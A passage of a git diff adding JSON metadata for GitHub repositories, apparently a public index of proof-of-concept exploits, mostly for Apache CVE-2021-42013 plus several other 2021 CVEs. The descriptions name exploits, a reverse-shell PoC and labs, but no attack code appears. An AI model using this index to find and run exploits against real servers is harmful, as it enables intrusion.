"2024-10-12T09:02:56Z", + "pushed_at": "2022-08-30T11:59:18Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 417233035, + "name": "cve-2021-42013-docker-lab", + "full_name": "twseptian\/cve-2021-42013-docker-lab", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2021-42013-docker-lab", + "description": "Docker container lab to play\/learn with CVE-2021-42013", + "fork": false, + "created_at": "2021-10-14T18:00:48Z", + "updated_at": "2023-10-18T07:48:46Z", + "pushed_at": "2022-02-09T17:27:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-42013", + "dockerfile", + "path-traversal-exploitation" + ], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 419389200, + "name": "CVE-2021-42013", + "full_name": "LayarKacaSiber\/CVE-2021-42013", + "owner": { + "login": "LayarKacaSiber", + "id": 92864439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92864439?v=4", + "html_url": "https:\/\/github.com\/LayarKacaSiber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LayarKacaSiber\/CVE-2021-42013", + "description": null, + "fork": false, + "created_at": "2021-10-20T15:32:39Z", + "updated_at": "2021-10-23T13:16:56Z", + "pushed_at": "2021-10-23T13:16:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420531710, + "name": "CVE-2021-42013", + "full_name": "TheLastVvV\/CVE-2021-42013", + "owner": { + "login": "TheLastVvV", + "id": 71128830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4", + "html_url": "https:\/\/github.com\/TheLastVvV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-42013", + "description": "Poc CVE-2021-42013 - Apache 2.4.50 without CGI", + "fork": false, + "created_at": "2021-10-23T21:58:44Z", + "updated_at": "2022-08-29T22:56:33Z", + "pushed_at": "2021-10-23T22:00:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420684825, + "name": "CVE-2021-42013_Reverse-Shell", + "full_name": "TheLastVvV\/CVE-2021-42013_Reverse-Shell", + "owner": { + "login": "TheLastVvV", + "id": 71128830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4", + "html_url": "https:\/\/github.com\/TheLastVvV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-42013_Reverse-Shell", + "description": "PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI", + "fork": false, + "created_at": "2021-10-24T12:57:55Z", + "updated_at": "2024-04-19T09:39:57Z", + "pushed_at": "2021-10-24T13:26:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421851715, + "name": "cve-2021-42013", + "full_name": "walnutsecurity\/cve-2021-42013", + "owner": { + "login": "walnutsecurity", + "id": 92915142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4", + "html_url": "https:\/\/github.com\/walnutsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2021-42013", + "description": "cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50", + "fork": false, + "created_at": "2021-10-27T14:29:10Z", + "updated_at": "2024-09-14T12:05:43Z", + "pushed_at": "2023-01-23T16:41:56Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 424321579, + "name": "CVE-2021-42013", + "full_name": "robotsense1337\/CVE-2021-42013", + "owner": { + "login": "robotsense1337", + "id": 84665951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84665951?v=4", + "html_url": "https:\/\/github.com\/robotsense1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robotsense1337\/CVE-2021-42013", + "description": "Exploit Apache 2.4.50(CVE-2021-42013)", + "fork": false, + "created_at": "2021-11-03T17:33:52Z", + "updated_at": "2021-11-04T04:50:20Z", + "pushed_at": "2021-11-03T17:41:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427958357, + "name": "CVE-2021-42013-ApacheRCE", + "full_name": "xMohamed0\/CVE-2021-42013-ApacheRCE", + "owner": { + "login": "xMohamed0", + "id": 94008154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4", + "html_url": "https:\/\/github.com\/xMohamed0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2021-42013-ApacheRCE", + "description": null, + "fork": false, + "created_at": "2021-11-14T14:58:26Z", + "updated_at": "2021-11-14T14:59:00Z", + "pushed_at": "2021-11-14T14:58:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441210162, + "name": "CVE-2021-42013-Apache-RCE-Poc-Exp", + "full_name": "asaotomo\/CVE-2021-42013-Apache-RCE-Poc-Exp", + "owner": { + "login": "asaotomo", + "id": 67818638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67818638?v=4", + "html_url": "https:\/\/github.com\/asaotomo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asaotomo\/CVE-2021-42013-Apache-RCE-Poc-Exp", + "description": "Apache 远程代码执行 (CVE-2021-42013)批量检测工具:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。", + "fork": false, + "created_at": "2021-12-23T14:46:41Z", + "updated_at": "2023-03-06T08:42:18Z", + "pushed_at": "2021-12-24T07:38:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve-2021-42013", + "exp", + "poc", + "python3" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 455174932, + "name": "CVE-2021-42013-LAB", + "full_name": "jas9reet\/CVE-2021-42013-LAB", + "owner": { + "login": "jas9reet", + "id": 34741406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34741406?v=4", + "html_url": "https:\/\/github.com\/jas9reet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas9reet\/CVE-2021-42013-LAB", + "description": "Apache HTTP Server 2.4.50 - RCE Lab", + "fork": false, + "created_at": "2022-02-03T13:26:05Z", + "updated_at": "2022-02-20T23:15:08Z", + "pushed_at": "2022-06-06T06:09:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467686191, + "name": "CVE-2021-42013", + "full_name": "mauricelambert\/CVE-2021-42013", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-42013", + "description": "These Nmap, Python and Ruby scripts detects and exploits CVE-2021-42013 with RCE and local file disclosure.", + "fork": false, + "created_at": "2022-03-08T21:48:40Z", + "updated_at": "2022-03-23T16:46:10Z", + "pushed_at": "2022-03-14T07:36:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-42013", + "detection", + "exploit", + "metasploit", + "nmap", + "python3", + "rce", + "ruby", + "scanner", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469575892, + "name": "CVE-2021-42013", + "full_name": "honypot\/CVE-2021-42013", + "owner": { + "login": "honypot", + "id": 101309325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4", + "html_url": "https:\/\/github.com\/honypot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honypot\/CVE-2021-42013", + "description": null, + "fork": false, + "created_at": "2022-03-14T04:08:24Z", + "updated_at": "2022-03-14T04:20:42Z", + "pushed_at": "2022-03-14T04:08:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482976975, + "name": "apache_2.4.50", + "full_name": "hadrian3689\/apache_2.4.50", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/apache_2.4.50", + "description": "CVE-2021-42013 - Apache 2.4.50", + "fork": false, + "created_at": "2022-04-18T19:49:14Z", + "updated_at": "2023-01-04T20:25:41Z", + "pushed_at": "2022-09-20T15:30:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498173029, + "name": "cve-2021-42013", + "full_name": "viliuspovilaika\/cve-2021-42013", + "owner": { + "login": "viliuspovilaika", + "id": 10381655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10381655?v=4", + "html_url": "https:\/\/github.com\/viliuspovilaika", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viliuspovilaika\/cve-2021-42013", + "description": "Exploit for Apache 2.4.50 (CVE-2021-42013)", + "fork": false, + "created_at": "2022-05-31T03:28:20Z", + "updated_at": "2022-05-31T03:29:22Z", + "pushed_at": "2022-05-31T04:37:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536994874, + "name": "cve-2021-42013", + "full_name": "mightysai1997\/cve-2021-42013", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-42013", + "description": null, + "fork": false, + "created_at": "2022-09-15T11:28:39Z", + "updated_at": "2024-11-13T13:49:43Z", + "pushed_at": "2022-09-15T11:28:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536997164, + "name": "cve-2021-42013L", + "full_name": "mightysai1997\/cve-2021-42013L", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-42013L", + "description": null, + "fork": false, + "created_at": "2022-09-15T11:35:00Z", + "updated_at": "2022-09-15T11:35:00Z", + "pushed_at": "2022-09-15T11:35:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537011231, + "name": "cve-2021-42013.get", + "full_name": "mightysai1997\/cve-2021-42013.get", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-42013.get", + "description": null, + "fork": false, + "created_at": "2022-09-15T12:15:00Z", + "updated_at": "2022-09-15T12:15:18Z", + "pushed_at": "2022-09-15T12:15:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 567841093, + "name": "CVE-2021-42013", + "full_name": "12345qwert123456\/CVE-2021-42013", + "owner": { + "login": "12345qwert123456", + "id": 63474188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63474188?v=4", + "html_url": "https:\/\/github.com\/12345qwert123456", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/12345qwert123456\/CVE-2021-42013", + "description": "Vulnerable configuration Apache HTTP Server version 2.4.49\/2.4.50", + "fork": false, + "created_at": "2022-11-18T17:53:46Z", + "updated_at": "2024-05-28T07:50:29Z", + "pushed_at": "2022-11-21T17:10:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-2021-42013", + "docker", + "http-server", + "lfi", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 650990250, + "name": "cve-2021-42013-httpd", + "full_name": "cybfar\/cve-2021-42013-httpd", + "owner": { + "login": "cybfar", + "id": 96472592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96472592?v=4", + "html_url": "https:\/\/github.com\/cybfar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybfar\/cve-2021-42013-httpd", + "description": "CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Apache 2.4.49 and 2.4.50", + "fork": false, + "created_at": "2023-06-08T08:49:15Z", + "updated_at": "2023-06-17T13:52:36Z", + "pushed_at": "2023-06-08T09:34:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656394946, + "name": "CVE-2021-42013", + "full_name": "vudala\/CVE-2021-42013", + "owner": { + "login": "vudala", + "id": 66208251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66208251?v=4", + "html_url": "https:\/\/github.com\/vudala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vudala\/CVE-2021-42013", + "description": "Exploring CVE-2021-42013, using Suricata and OpenVAS to gather info", + "fork": false, + "created_at": "2023-06-20T21:43:13Z", + "updated_at": "2023-11-22T14:25:04Z", + "pushed_at": "2023-06-22T05:15:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660279030, + "name": "CVE-2021-42013", + "full_name": "Hamesawian\/CVE-2021-42013", + "owner": { + "login": "Hamesawian", + "id": 67901852, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67901852?v=4", + "html_url": "https:\/\/github.com\/Hamesawian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hamesawian\/CVE-2021-42013", + "description": null, + "fork": false, + "created_at": "2023-06-29T16:32:44Z", + "updated_at": "2023-07-03T11:02:08Z", + "pushed_at": "2023-06-29T16:34:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683184103, + "name": "CVE-2021-42013-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2021-42013-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-42013-EXPLOIT", + "description": "A PoC exploit for CVE-2021-42013 - Apache 2.4.49 & 2.4.50 Remote Code Execution", + "fork": false, + "created_at": "2023-08-25T19:51:01Z", + "updated_at": "2024-10-14T09:10:27Z", + "pushed_at": "2024-01-15T18:01:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 783337932, + "name": "CVE-2021-42013", + "full_name": "BassoNicolas\/CVE-2021-42013", + "owner": { + "login": "BassoNicolas", + "id": 70383324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70383324?v=4", + "html_url": "https:\/\/github.com\/BassoNicolas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BassoNicolas\/CVE-2021-42013", + "description": "CVE-2021-42013 Vulnerability Scanner This Python script checks for the Remote Code Execution (RCE) vulnerability (CVE-2021-42013) in Apache 2.4.50. ", + "fork": false, + "created_at": "2024-04-07T16:04:06Z", + "updated_at": "2024-04-28T05:01:30Z", + "pushed_at": "2024-04-07T17:15:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 820456218, + "name": "CVE-2021-42013", + "full_name": "rafifdna\/CVE-2021-42013", + "owner": { + "login": "rafifdna", + "id": 52586579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52586579?v=4", + "html_url": "https:\/\/github.com\/rafifdna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rafifdna\/CVE-2021-42013", + "description": "CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (2.4.50)", + "fork": false, + "created_at": "2024-06-26T13:57:52Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-06-27T17:57:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829189828, + "name": "cve-2021-42013-apache", + "full_name": "dream434\/cve-2021-42013-apache", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/cve-2021-42013-apache", + "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted “the issue is known to be exploited in the wild” and later it was identified that the vulnerabi", + "fork": false, + "created_at": "2024-07-16T00:12:18Z", + "updated_at": "2024-10-09T13:42:50Z", + "pushed_at": "2024-10-09T13:42:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836125410, + "name": "cve-2021-42013", + "full_name": "bananoname\/cve-2021-42013", + "owner": { + "login": "bananoname", + "id": 177087379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177087379?v=4", + "html_url": "https:\/\/github.com\/bananoname", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bananoname\/cve-2021-42013", + "description": null, + "fork": false, + "created_at": "2024-07-31T07:48:39Z", + "updated_at": "2024-08-01T13:25:27Z", + "pushed_at": "2024-08-01T13:25:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4204.json b/2021/CVE-2021-4204.json new file mode 100644 index 0000000000..3448ea4399 --- /dev/null +++ b/2021/CVE-2021-4204.json @@ -0,0 +1,33 @@ +[ + { + "id": 463038208, + "name": "CVE-2021-4204", + "full_name": "tr3ee\/CVE-2021-4204", + "owner": { + "login": "tr3ee", + "id": 26628940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26628940?v=4", + "html_url": "https:\/\/github.com\/tr3ee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tr3ee\/CVE-2021-4204", + "description": "CVE-2021-4204: Linux Kernel eBPF Local Privilege Escalation", + "fork": false, + "created_at": "2022-02-24T06:43:56Z", + "updated_at": "2024-10-21T10:38:14Z", + "pushed_at": "2022-03-19T06:32:50Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 60, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42056.json b/2021/CVE-2021-42056.json new file mode 100644 index 0000000000..6ab264d4b9 --- /dev/null +++ b/2021/CVE-2021-42056.json @@ -0,0 +1,33 @@ +[ + { + "id": 429460440, + "name": "Safenet_SAC_CVE-2021-42056", + "full_name": "z00z00z00\/Safenet_SAC_CVE-2021-42056", + "owner": { + "login": "z00z00z00", + "id": 94624785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94624785?v=4", + "html_url": "https:\/\/github.com\/z00z00z00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z00z00z00\/Safenet_SAC_CVE-2021-42056", + "description": "Safenet Authentication Client Privilege Escalation - CVE-2021-42056", + "fork": false, + "created_at": "2021-11-18T14:27:06Z", + "updated_at": "2024-07-31T09:23:42Z", + "pushed_at": "2023-07-28T15:17:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42063.json b/2021/CVE-2021-42063.json new file mode 100644 index 0000000000..c8fad14337 --- /dev/null +++ b/2021/CVE-2021-42063.json @@ -0,0 +1,40 @@ +[ + { + "id": 792995989, + "name": "CVE-2021-42063", + "full_name": "Cappricio-Securities\/CVE-2021-42063", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-42063", + "description": "SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting", + "fork": false, + "created_at": "2024-04-28T06:09:14Z", + "updated_at": "2024-05-28T06:26:47Z", + "pushed_at": "2024-06-21T06:25:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tools", + "cve-2021-42063", + "vapt", + "xss", + "xss-detection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42071.json b/2021/CVE-2021-42071.json new file mode 100644 index 0000000000..1bd8afc86f --- /dev/null +++ b/2021/CVE-2021-42071.json @@ -0,0 +1,33 @@ +[ + { + "id": 417560973, + "name": "CVE-2021-42071", + "full_name": "adubaldo\/CVE-2021-42071", + "owner": { + "login": "adubaldo", + "id": 17628687, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17628687?v=4", + "html_url": "https:\/\/github.com\/adubaldo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adubaldo\/CVE-2021-42071", + "description": "In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin\/slogin\/login.py User-Agent HTTP header.", + "fork": false, + "created_at": "2021-10-15T16:08:16Z", + "updated_at": "2021-10-15T16:08:16Z", + "pushed_at": "2021-10-15T16:08:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42171.json b/2021/CVE-2021-42171.json new file mode 100644 index 0000000000..78700f190d --- /dev/null +++ b/2021/CVE-2021-42171.json @@ -0,0 +1,33 @@ +[ + { + "id": 411900067, + "name": "CVE-2021-42171", + "full_name": "minhnq22\/CVE-2021-42171", + "owner": { + "login": "minhnq22", + "id": 19742808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19742808?v=4", + "html_url": "https:\/\/github.com\/minhnq22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minhnq22\/CVE-2021-42171", + "description": "File upload to Remote Code Execution on Zenario CMS 9.0.54156", + "fork": false, + "created_at": "2021-09-30T02:44:19Z", + "updated_at": "2022-04-03T03:22:30Z", + "pushed_at": "2023-06-22T06:27:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42183.json b/2021/CVE-2021-42183.json new file mode 100644 index 0000000000..58c21920ec --- /dev/null +++ b/2021/CVE-2021-42183.json @@ -0,0 +1,33 @@ +[ + { + "id": 488989628, + "name": "CVE-2021-42183", + "full_name": "0xRaw\/CVE-2021-42183", + "owner": { + "login": "0xRaw", + "id": 76697978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76697978?v=4", + "html_url": "https:\/\/github.com\/0xRaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRaw\/CVE-2021-42183", + "description": null, + "fork": false, + "created_at": "2022-05-05T13:45:43Z", + "updated_at": "2024-04-28T07:48:25Z", + "pushed_at": "2024-04-28T07:48:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, 